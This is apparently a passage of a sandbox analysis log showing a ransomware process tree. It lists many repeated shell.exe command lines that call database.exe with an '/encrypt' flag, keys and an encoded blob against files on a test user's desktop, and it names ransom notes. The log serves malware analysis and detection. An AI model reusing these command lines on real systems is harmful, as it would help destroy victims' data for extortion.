  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"
  5⤵
  PID:7972
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"
  5⤵
  PID:7980
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"
  5⤵
  PID:7988
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"
  5⤵
  PID:8000
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"
  5⤵
  PID:8008
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"
  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Agent.gen-c258088499ef0bcd93fa23f726bef802a11fe8aa03b95262f827e0a7c01aa2c5.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Blocker.gen-bd8d1fb9b2ffb5690b84e32e5d6c794d42ec4ec753222478092776ea1e483991.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Generic-8a57e361887aca6d776de1c2cc8f1f30cfddd2cf882726fab12084f06bda0c1a.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\KEYIDS.KLST.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8052
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.MSIL.Agent.fqnw-d1afbbebb8c29d49b2bec1b5e01cec2d786dc36ede052c35b61978fe3dca1102.gif"
  5⤵
    PID:8068
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.fpnf-bc26d4efe4a5f638a12e88f589d0097e67d71c73273fedd2ede0dfe4a41c39df.gif"
  5⤵
    PID:8072
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe"
  5⤵
    PID:8080
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe"
  5⤵
    PID:8088
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe"
  5⤵
    PID:8096
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe.gif"
  5⤵
    PID:8104
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe.gif"
  5⤵
    PID:8108
• C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" 